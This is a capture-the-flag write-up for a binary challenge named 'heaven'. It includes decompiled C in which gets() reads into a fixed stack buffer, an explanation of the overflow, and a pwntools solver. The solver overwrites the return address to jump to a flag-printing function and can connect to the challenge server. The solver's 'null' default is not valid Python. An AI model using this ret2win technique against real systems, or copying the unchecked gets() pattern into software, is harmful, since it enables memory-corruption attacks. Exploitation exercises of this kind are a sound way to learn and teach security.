Rating:
We were given a binary.
int heavens_secret()
{
char v1; // [rsp+7h] [rbp-9h]
FILE *stream; // [rsp+8h] [rbp-8h]
stream = fopen("flag.txt", "r");
do
{
v1 = fgetc(stream);
putchar(v1);
}
while ( v1 != -1 );
return fclose(stream);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
char nptr[524]; // [rsp+0h] [rbp-210h] BYREF
int v5; // [rsp+20Ch] [rbp-4h]
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
puts("Welcome to heaven!");
puts("what would you like to do here:");
printf(" 1. rest\n 2. have fun\n 3. relive a memory\n 4. get the flag\n>>");
gets(nptr);
v5 = atoi(nptr);
if ( nptr[0] == 52 )
return puts("what is this option?");
if ( nptr[0] <= 52 )
{
if ( nptr[0] == 51 )
return puts("wether it's a good one or a hurtful one we all want to relive a memory, so here you go.");
if ( nptr[0] <= 51 )
{
if ( nptr[0] == 49 )
return puts("you chose wisely, after all you have been through u deserve to rest");
if ( nptr[0] == 50 )
return puts("nice choice!!!. who doesnt want to have fun in their life ;)");
}
}
return puts("dude how did you even get here!?");
}
The program ask the user for input a data using the gets() function which doesn’t perform a boundary check, so it will cause a vulnerability called Buffer Overflow. Since there’s a function to read and print the content of the flag file (heavens_secret function), we can perform ROP to do ret2win (return to the heavens_secret function).
Solver:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from os import path
import sys
# ==========================[ Information
DIR = path.dirname(path.abspath(__file__))
EXECUTABLE = "/heaven"
TARGET = DIR + EXECUTABLE
HOST, PORT = "52.59.124.14", 10050
REMOTE, LOCAL = False, False
# ==========================[ Tools
elf = ELF(TARGET)
elfROP = ROP(elf)
# ==========================[ Configuration
context.update(
arch=["i386", "amd64", "aarch64"][1],
endian="little",
os="linux",
log_level = ['debug', 'info', 'warn'][2],
terminal = ['tmux', 'split-window', '-h'],
)
# ==========================[ Exploit
def exploit(io, libc=null):
if LOCAL==True:
#raw_input("Fire GDB!")
if len(sys.argv) > 1 and sys.argv[1] == "d":
choosen_gdb = [
"source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py", # 0 - pwndbg
"source /home/mydata/tools/gdb/gdb-peda/peda.py", # 1 - peda
"source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py" # 2 - gef
][0]
cmd = choosen_gdb + """
"""
gdb.attach(io, gdbscript=cmd)
p = b""
p += b"A"*(0x210) # sub rbp, 0x210
p += p64(0xdeadbeef) # rbp
p += p64(elf.symbols["heavens_secret"]) # rip
io.sendline(p)
io.interactive()
if __name__ == "__main__":
io, libc = null, null
if args.REMOTE:
REMOTE = True
io = remote(HOST, PORT)
# libc = ELF("___")
else:
LOCAL = True
io = process(
[TARGET, ],
env={
# "LD_PRELOAD":DIR+"/___",
# "LD_LIBRARY_PATH":DIR+"/___",
},
)
# libc = ELF("___")
exploit(io, libc)
```
